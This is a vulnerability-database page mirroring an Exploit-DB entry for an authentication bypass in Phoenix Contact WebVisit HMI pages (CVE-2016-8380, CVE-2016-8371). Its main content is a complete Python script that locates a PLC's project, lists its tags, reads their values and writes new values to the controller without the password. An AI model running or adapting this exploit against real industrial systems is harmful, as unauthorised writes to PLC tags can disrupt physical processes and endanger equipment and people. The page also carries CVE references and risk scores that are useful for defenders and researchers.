Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Phoenix Contact WebVisit 2985725 - Authentication Bypass

🗓️ 12 Oct 2018 00:00:00Reported by PhotubiasType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 552 Views

Script for reading and writing PLC tags via Webvisit HMI page, with potential authentication bypass vulnerability

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Phoenix Contact WebVisit 2985725 - Authentication Bypass Exploit
12 Oct 201800:00
zdt
CNVD		Phoenix Contact ILC Security Bypass Vulnerability
10 Nov 201600:00
cnvd
CNVD		Phoenix Contact ILC Authentication Bypass Vulnerability
10 Nov 201600:00
cnvd
CVE		CVE-2016-8371
5 Apr 201816:00
cve
CVE		CVE-2016-8380
5 Apr 201816:00
cve
Cvelist		CVE-2016-8371
5 Apr 201816:00
cvelist
Cvelist		CVE-2016-8380
5 Apr 201816:00
cvelist
exploitpack		Phoenix Contact WebVisit 2985725 - Authentication Bypass
12 Oct 201800:00
exploitpack
ICS		Phoenix Contact ILC PLC Authentication Vulnerabilities
12 Aug 201606:00
ics
ICS		Phoenix Contact ILC PLC Authentication Vulnerabilities
8 Nov 201600:00
ics
Rows per page
# Exploit Title: Phoenix Contact WebVisit 2985725 - Authentication Bypass
# Date: 2018-09-30
# Exploit Author: Deneut Tijl
# Vendor Homepage: www.phoenixcontact.com
# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5
# Version: WebVisit (all versions)
# CVE : CVE-2016-8380, CVE-2016-8371

# Description
# Script to read and write PLC tags via a Webvisit HMI page (even in case of a password protection)
# Steps:
# * Get Project Name: http://<ip>/
# * Get list of tags: http://<ip>/<projectname>.tcr
# * Get current values of tags: http://<ip>/cgi-bin/ILRReadValues.exe
# * Set new tag values: http://<ip>/cgi-bin/writeVal.exe?<tag>+<value> (urlencode!)

# CVE-2016-8380-SetPLCValues.py

#! /usr/bin/env python

import urllib2

strIP = raw_input('Please enter an IP [192.168.1.200]: ')
if strIP == '': strIP = '192.168.1.200'

try:
    URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))
except urllib2.HTTPError:
    print('#### Critical Error with IP ' + strIP + ': no response')
    raw_input('Press Enter to exit')
    exit()

strProject = ''
for line in URLResponse.readlines():
    if 'ProjectName' in line:
        strProject = line.split('VALUE="')[1].split('"')[0]

if strProject == '':
    print('#### Error, no \'ProjectName\' found on the main page')
    raw_input('Press Enter to exit')
    exit()

print('---- Found project \'' + strProject + '\', retrieving list of tags')

try:
    TagResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strProject + '.tcr'))
except urllib2.HTTPError:
    print('#### Critical Error with IP ' + strIP + ': /' + strProject + '.tcr not found')
    raw_input('Press Enter to exit')
    exit()

arrTagList = []
for line in TagResponse.readlines():
    if line.startswith('#!-- N ='):
        intNumberOfTags = int(line.split('=')[1])
        print('---- There should be ' + str(intNumberOfTags) + ' tags:')
    if not line.startswith('#'):
        if not line.split(';')[0].strip() == '':
            arrTagList.append(line.split(';')[0].strip())
            print('-- '+line.split(';')[0].strip())


raw_input('Press Enter to query them all')
import os, urllib
os.system('cls' if os.name == 'nt' else 'clear')
strPost = '<body>'
strPost += '<item_list_size>' + str(len(arrTagList)) + '</item_list_size>'
strPost += '<item_list>'
for item in arrTagList:
    strPost += '<i><n>' + item + '</n></i>'
strPost += '</item_list></body>'
DataResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/ILRReadValues.exe', strPost)).read()

arrData = []
for item in DataResponse.split('<i>'):
    if '<n>' in item:
        name = item.split('<n>')[1].split('</n>')[0]
        value = item.split('<v>')[1].split('</v>')[0]
        arrData.append((name,value))
print('----- Full list of tags and their values:')
i = 0
for item in arrData:
    i += 1
    print(str(i) + ': Tag ' + item[0] + ' has value: ' + item[1])

ans1 = raw_input('Want to change a tag? Enter a number or press Enter to quit: ')
if ans1 == '':
    exit()
strTag = arrData[int(ans1) - 1][0]
strVal = arrData[int(ans1) - 1][1]
ans2 = raw_input('Setting value for ' + strTag + ' [' + strVal + ']: ')
if ans2 == '': ans2 = strVal
urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/writeVal.exe?' + urllib.quote_plus(strTag) + '+' + str(ans2)))

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Oct 2018 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 37.3
CVSS 27.5
EPSS0.12534
phoenix contactauthentication bypasswebvisitplc tagshmi pagecve-2016-8380cve-2016-8371vulnerability
552